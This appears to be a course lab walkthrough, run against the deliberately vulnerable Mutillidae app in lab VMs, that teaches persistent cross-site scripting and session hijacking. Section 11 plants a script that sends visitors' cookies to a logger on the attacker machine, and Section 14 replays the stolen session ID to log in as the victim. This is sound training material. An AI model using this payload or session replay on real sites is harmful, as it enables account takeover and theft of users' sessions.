{ Man-in-the-Middle, Persistent Covert Cross Site Scripting Injection #2 }
Section 0. Background Information |
- What is Mutillidae?
- OWASP Mutillidae II is a free, open source, deliberately vulnerable web-application providing a target for web-security enthusiast.
- What is a Man-In-The-Middle attack?
- The man-in-the-middle attack take on many forms. The most common form is active network eavesdropping in which the attacker is able to gain authentication credentials (Username, Password, SESSIONID, Cookies Information, etc).
- What is a Reflective Cross Site Scripting?
- The non-persistent (or reflected) cross-site scripting vulnerability is by far the most common type. These holes show up when the data provided by a web client, most commonly in HTTP query parameters or in HTML form submissions, is used immediately by server-side scripts to parse and display a page of results for and to that user, without properly sanitizing the request.
- What is a Persistent Cross Site Scripting Injection?
- The persistent XSS vulnerability is a more devastating variant because the injection is actually permanently stored in the blog, message board, etc.
- Imagine if a sensitive website had a poor designer did not test for injections. A malicious person could simply put in a hidden cookie harvester script and sit back and watch there logs for SESSION cookies.
- What is Cookies Manager+?
- Cookies manager to view, edit and create new cookies. It also shows extra information about cookies, allows edit multiple cookies at once and backup/restore them.
- In future labs, we will use Cookies Manager to help simulate a man-in-the-middle attack
- Pre-Requisite Lab
- Mutillidae: Lesson 1: How to Install Mutillidae in Fedora
- Note: Remote database access has been turned on to provide an additional vulnerability.
- BackTrack: Lesson 1: Installing BackTrack 5
- Note: This is not absolutely necessary, but if you are a computer security student or professional, you should have a BackTrack VM.
- BackTrack: Lesson 9: How To Install Firebug
- Note: Firebug integrates with Firefox to put a wealth of web development tools at your fingertips while you browse. You can edit, debug, and monitor CSS, HTML, and JavaScript live in any web page.
- Mutillidae: Lesson 13: Reflected Cross Site Scripting Injection #1, Man-In-The-Middle
- Note: If you have not completed the above lab, you will not be able to continue past Section 9.
- Lab Notes
- In this lab we will do the following:
- Due to a purposeful bug in the add-to-your-blog.php code, we will use Persistent Cross Site Scripting Techniques to covert send cookie data to a remote site.
- In the blog, we will place a covert persistent XSS injection in a blog to create a man-in-the-middle attack.
- We will capture the username and session credentials.
- From a remote machine we will login with those username and session credentials.
- Legal Disclaimer - bài hướng dẫn thực hành, chỉ dùng cho môi trường lớp học
Section 1. Configure Fedora14 Virtual Machine Settings |
- Open Your VMware Player
- Instructions:
- On Your Host Computer, Go To
- Start --> All Program --> VMWare --> VMWare Player
- Edit Fedora Mutillidae Virtual Machine Settings
- Instructions:
- Highlight fedora14
- Click Edit virtual machine settings
data:image/s3,"s3://crabby-images/56e39/56e39a1f33b338678dca560773e0d6825b9aa835" alt=""
- Edit Network Adapter
- Instructions:
- Highlight Network Adapter
- Select Bridged
- Click the OK Button
data:image/s3,"s3://crabby-images/5c03a/5c03aa758442feb8251cee23e416a0f25788d96d" alt=""
Section 2. Login to Fedora14 - Mutillidae |
- Start Fedora14 VM Instance
- Instructions:
- Start Up VMWare Player
- Select Fedora14 - Mutillidae
- Play virtual machine
data:image/s3,"s3://crabby-images/4cfef/4cfef362fc42897a681d71143bd55a6966a75748" alt=""
- Login to Fedora14 - Mutillidae
- Instructions:
- Login: student
- Password: <whatever you set it to>.
-
data:image/s3,"s3://crabby-images/69047/69047b5afa0bfecc8f073b1b7197801b46383f73" alt=""
Section 3. Open Console Terminal and Retrieve IP Address |
- Start a Terminal Console
- Instructions:
- Applications --> Terminal
data:image/s3,"s3://crabby-images/63de6/63de6da9560f6e57edff1caa3a27fe3870632fff" alt=""
- Switch user to root
- Instructions:
- su - root
- <Whatever you set the root password to>
-
data:image/s3,"s3://crabby-images/d6e3f/d6e3fe7167a2a2da99fcf897f3481b7e832f6b31" alt=""
- Get IP Address
- Instructions:
- ifconfig -a
- Notes (FYI):
- As indicated below, my IP address is 192.168.1.111.
- Please record your IP address.
Section 4. Configure BackTrack Virtual Machine Settings |
- Edit the BackTrack5R1 VM
- Instructions:
- Select BackTrack5R1 VM
- Click Edit virtual machine settings
data:image/s3,"s3://crabby-images/3afbf/3afbfe1d81285fe63946c48770de035c375e71bf" alt=""
- Edit Virtual Machine Settings
- Instructions:
- Click on Network Adapter
- Click on the Bridged Radio button
- Click on the OK Button
Section 5. Play and Login to BackTrack |
- Play the BackTrack5R1 VM
- Instructions:
- Click on the BackTrack5R1 VM
- Click on Play virtual machine
data:image/s3,"s3://crabby-images/7520e/7520e60be23f3e1e971842dfe1aa6e2f58bbbdbf" alt=""
- Login to BackTrack
- Instructions:
- Login: root
- Password: toor or <whatever you changed it to>.
- Bring up the GNOME
- Instructions:
- Type startx
Section 6. Open Console Terminal and Retrieve IP Address |
- Start up a terminal window (On BackTrack5R1)
- Instructions:
- Click on the Terminal Window
- Obtain the IP Address
- Instructions:
- ifconfig -a
- Note(FYI):
- My IP address 192.168.1.112.
- In your case, it will probably be different.
- This is the machine that will be use to attack the victim machine (Mutillidae).
data:image/s3,"s3://crabby-images/90dc4/90dc4a7ce365bf90bac954c0a538837c861a8769" alt=""
Section 7. Login to Damn Vulnerable WXP-SP2 (Victim Machine) |
- Edit Virtual Machine Settings
- Instructions:
- Click on Damn Vulnerable WXP-SP2
- Edit Virtual Machine Settings
- Note(FYI):
- This third Virtual Machine does not have to be Windows XP. I just need to be another Virtual Machine to demonstrate how the cookie will be sent covertly with the victim knowing.
- Set Network Adapter
- Instructions:
- Click on Network Adapter
- Click on the radio button "Bridged: Connected directly to the physical network".
- Start Up Damn Vulnerable WXP-SP2.
- Instructions:
- Start Up your VMware Player
- Play virtual machine
- Logging into Damn Vulnerable WXP-SP2.
- Instructions:
- Username: administrator
- Password: <Provide the Password>
- Open a Command Prompt
- Instructions:
- Start --> All Programs --> Accessories --> Command Prompt
- Obtain the IP Address
- Instructions:
- In the Command Prompt type "ipconfig"
- Note(FYI):
- In my case, Damn Vulnerable WXP-SP2's IP Address 192.168.1.116.
- This is the IP Address of the Victim Machine.
- Record your IP Address.
data:image/s3,"s3://crabby-images/4e3b3/4e3b3254101dda4000953c6d264ecb14f499b0a0" alt=""
Section 8. Start Apache Webserver |
- Start Apache2 (On BackTrack5R1)
- Instructions:
- service apache2 start
- service apache2 status
- ps -eaf | grep apache2 | grep -v grep
- Note(FYI):
- Start up the apache2 webserver.
- Display the status of the apache2 webserver.
- See the processes of the apache2 webserver.
Section 9. Verify Cookie Script Exists |
- Verify Cookie Script Exists (On BackTrack5R1)
- Instructions:
- ls -l /usr/lib/cgi-bin/logit.pl
- cat /dev/null > /var/www/logdir/log.txt
- ls -l /var/www/logdir/log.txt
- Note(FYI):
- List the logit.pl script. If this script is not present, then complete the pre-requisite lab.
- Clear the log.txt havest0r file.
- Notice the log.txt is now a Zero Byte File.
data:image/s3,"s3://crabby-images/c78c2/c78c2f0cf50035b58e251eb4de34f201c942d011" alt=""
Section 10. Open Mutillidae |
- Open Firefox (On BackTrack5R1)
- Instructions:
- Click on the Firefox Icon
- Notes (FYI):
- If FireFox Icon does not exist in the Menu Bar Tray, then go to Applications --> Internet --> Firefox Web Browser
data:image/s3,"s3://crabby-images/c53e6/c53e621c8027cc1538f15ddbde9cf37a05ec69be" alt=""
- Open Mutillidae
- Notes (FYI):
- Replace 192.168.1.111 in the following URL --> http://192.168.1.111/mutillidae, with your Mutillidae's IP Address obtained from (Section 3, Step 3)
- Instructions:
- Place the following URL in the Address Bar
- http://192.168.1.111/mutillidae/
data:image/s3,"s3://crabby-images/56b8c/56b8cd192125a0f27a7ab8115b8416808470bdb0" alt=""
- Reset Database
- Instructions:
- Click the Reset DB Link
- Notes (FYI):
- This link will remove the XSS Injection from the database.
data:image/s3,"s3://crabby-images/80345/80345a0ad5c384fb3c1e130829bdac2f15eacc10" alt=""
- Proceed with Database Reset
- Instructions:
- Click the OK Button
data:image/s3,"s3://crabby-images/b3a8c/b3a8ca9291e7331d5dca3760e2664f10c36c38b7" alt=""
Section 11. Persistent Covert Cross Site Script(XSS) |
- Add to your blog
- Instructions:
- OWASP Top 10 --> A2 - Cross Site Scripting(XSS) --> Persistent(Second Order) --> Add to your blog
data:image/s3,"s3://crabby-images/2d20b/2d20bc335962445ef9914723d92952d11650a2f7" alt=""
- Inspect Element
- Instructions:
- Right Click in the Comment Box
- Click Inspect Element
- Note(FYI):
- This is not a necessary step for the injection. The goal is to allow the injection attempt to remain on the same line instead of being word-wrapped.
data:image/s3,"s3://crabby-images/3061c/3061c7d18f70d83cc1d96cc0432adb7ac463dfce" alt=""
- Change Text Area Column Length
- Instructions:
- Change 65 to 95
- Click Close Button (See Picture)
- Covert Cookie Harvest0r Cross Site Script (XSS) Injection
- Note(FYI):
- Replace 192.168.1.112 with your BackTrack IP Address obtained in (Section 6, Step 2).
- This JavaScript tells the web browser to send the cookies back to the CGI Cookie Script on the BackTrack Machine.
- Instructions:
- Place the below text in the comment box.
- <script> new Image().src="http://192.168.1.112/cgi-bin/logit.pl?"+document.cookie; </script>
- Click the Save Blog Entry
- View Cookie Harvest0r Cross Site Script (XSS) Results
- Note(FYI):
- Notice nothing is displayed under the comment cell.
- Or are your eyes deceiving you?
data:image/s3,"s3://crabby-images/a4461/a44615df83b343e553393033f1ff63b141375624" alt=""
- View the Havest0r Log
- Instructions:
- cat /var/www/logdir/log.txt
- Notes (FYI):
- Although the Blog displayed nothing back to us, it was covertly recorded in our Havest0r log.
- How do you like them apples?
data:image/s3,"s3://crabby-images/110d6/110d6d3237887578d92d4f3c9efe137a1ea72cf6" alt=""
Section 12. Login to Mutillidae |
- Start up Internet Explo[d]er (On Damn Vulnerable WXP-SP2)
- Instructions:
- Start --> All Programs --> Internet Explorer
data:image/s3,"s3://crabby-images/bbd88/bbd886c9e360f2caa4f3fc782a30ccbe5f5aca05" alt=""
- Open the Mutillidae Application
- Notes (FYI):
- Replace 192.168.1.111 in the following URL --> http://192.168.1.111/mutillidae, with your Mutillidae's IP Address obtained from (Section 3, Step 3)
- Instructions:
- Place the following URL in the Address Bar
- http://192.168.1.111/mutillidae/
- Click Login/Register
data:image/s3,"s3://crabby-images/db190/db190074059b6e9645d99ce1173717d6cd5b2647" alt=""
- Login
- Instructions:
- Name: samurai
- Password: samurai
- Click the Login Button
- Notes(FYI):
- We are logging on to Mutillidae to simulate a user logging on to a real application and being granted a Session ID.
data:image/s3,"s3://crabby-images/378df/378df064e59701523e60a236bf4c3756dcf01e6a" alt=""
- View someone's blog
- Instructions:
- OWASP Top 10 --> A2 - Cross Site Scripting (XSS) --> Persistent (Second Order) --> View someones's blog
data:image/s3,"s3://crabby-images/5be54/5be54b739efd4746b844e4641fc61072ce907dba" alt=""
- Show All Blog Entries
- Instructions:
- Select Show All from the down drop menu
- View Blog Entries
data:image/s3,"s3://crabby-images/be4d5/be4d5cb216d3f8288cccb35c73dfd8beb8bb55bf" alt=""
- View Blog Entries
- Note(FYI):
- Notice nothing is displayed under the comment cell.
- Is this Deja Vu?
data:image/s3,"s3://crabby-images/b962f/b962fc69875215b682ab4a338e45733611cdbfd3" alt=""
Section 13. View Havest0r Log |
- View the Havest0r Log (On BackTrack5R1)
- Instructions:
- cat /var/www/logdir/log.txt
- Notes (FYI):
- Notice the cookie now shows the username samurai.
- Notice the cookie now shows the PHP Session ID, which is pretty much equivalent to a password.
data:image/s3,"s3://crabby-images/adabe/adabe42900fb9177948ea6e548a0acbdb669e25b" alt=""
Section 14. Simulate Man-In-The-Middle Attack |
- On BackTrack, Open Firefox (On BackTrack5R1)
- Instructions:
- Click on the Firefox Icon
- Notes (FYI):
- If FireFox Icon does not exist in the Menu Bar Tray, then go to Applications --> Internet --> Firefox Web Browser
data:image/s3,"s3://crabby-images/c53e6/c53e621c8027cc1538f15ddbde9cf37a05ec69be" alt=""
- Start Cookies Manager+
- Instructions:
- Tools --> Cookies Manager+
- Notes (FYI):
- Click here to install Cookie Manager+ you have not already done so.
data:image/s3,"s3://crabby-images/5c30a/5c30a948239455fbf2129eb29280f8f36b2ad3ed" alt=""
- Add Cookie Entry
- Instructions:
- Click the Add Button
data:image/s3,"s3://crabby-images/9e6e5/9e6e5eb671089fcf76a6934f78820f65a8ff9e55" alt=""
- Add PHPSESSID Cookie Entry
- Note(FYI):
- Replace jri8sj5cnl6ironsqtnbpo9e21 with your PHPSESSID found in crack_cookies.txt (See Below Picture).
- Replace 192.168.1.111 with Mutillidae's IP Address Host IP Address obtained from (Section 3, Step 3).
- Instructions:
- Name: PHPSESSID
- Content: jri8sj5cnl6ironsqtnbpo9e21
- Host: 192.168.1.111
- Path: /
- Click the Save Button.
data:image/s3,"s3://crabby-images/6b462/6b462aea1fece645db39e8b10377e8800cdd2c06" alt=""
- Add Cookie Entry
- Instructions:
- Click the Add Button
data:image/s3,"s3://crabby-images/d16f4/d16f42d310b25880083bb42036cb41816c3aafd8" alt=""
- Add showhints Cookie Entry
- Note(FYI):
- Replace 192.168.1.111 with Mutillidae's IP Address Host IP Address obtained from (Section 3, Step 3).
- Instructions:
- Name: showhints
- Content: 0
- Host: 192.168.1.111
- Path: /mutillidae/
- Click the Save Button
data:image/s3,"s3://crabby-images/db1c8/db1c8fb3c1d0c6473af0d68c389ab81bf61f916f" alt=""
- Add Cookie Entry
- Instructions:
- Click the Add Button
data:image/s3,"s3://crabby-images/153bd/153bd5df94b2dc7dc468a8d2ce88382e8207d54a" alt=""
- Add username Cookie Entry
- Note(FYI):
- Replace 192.168.1.111 with Mutillidae's IP Address Host IP Address obtained from (Section 3, Step 3).
- Instructions:
- Name: username
- Content: samurai
- Host: 192.168.1.111
- Path: /mutillidae/
- Click the Save Button
data:image/s3,"s3://crabby-images/2326d/2326d81e36ae719e3d403f3eb8e875135dd4584a" alt=""
- Add Cookie Entry
- Instructions:
- Click the Add Button
data:image/s3,"s3://crabby-images/90ddb/90ddb228a06f9aaf8530cc4c098ff547f1bea9ea" alt=""
- Add uid Cookie Entry
- Note(FYI):
- Replace 192.168.1.111 with Mutillidae's IP Address Host IP Address obtained from (Section 3, Step 3).
- Instructions:
- Name: uid
- Content: 6
- Host: 192.168.1.111
- Path: /mutillidae/
- Click the Save Button
- Click the Close Button
data:image/s3,"s3://crabby-images/b319f/b319f088e427a8995534f08811d9b8c3835409d2" alt=""
- Implement Man-in-the-Middle Attack
- Note(FYI):
- Replace 192.168.1.111 with Mutillidae's IP Address Host IP Address obtained from (Section 3, Step 3).
- Notice you will be automagically logged in without a password. For this reason, it is extremely important that session information is (1) not only encrypted, (2) but also users logout after they finish their session.
- Instructions:
- http://192.168.1.111/mutillidae/
- Notice that user samurai logged in without a password.
data:image/s3,"s3://crabby-images/eba65/eba65c80c328d9b18d433f48e576d2e0b2c38f24" alt=""
- On BackTrack, Start up a terminal window (On BackTrack5R1)
- Instructions:
- Click on the Terminal Window
- Proof of Lab, (On a BackTrack Terminal)
- Instructions:
- cd
- ls -l /usr/lib/cgi-bin/logit.pl
- cat /var/www/logdir/log.txt
- sqlite3 ~/.mozilla/firefox/*default/places.sqlite "select * from moz_places;" | grep "add-to-your-blog" | tail -1
- sqlite3, A command line interface for SQLite version 3
- Database File, ~/.mozilla/firefox/*default/places.sqlite
- select * from moz_places, Display all records from the firefox history table.
- grep "add-to-your-blog", Display records that only contain the string "add-to-your-blog".
- tail -1, Only display the last record.
- date
- echo "Your Name"
- Replace the string "Your Name" with your actual name.
- e.g., echo "John Gray"
- Proof of Lab Instructions:
- Do a PrtScn
- Paste into a word document
- Upload to website www.antoanthongtin.edu.vn
-
data:image/s3,"s3://crabby-images/30e55/30e5525695b1abd518c372040bfb2bef402b5014" alt=""
Không có nhận xét nào:
Đăng nhận xét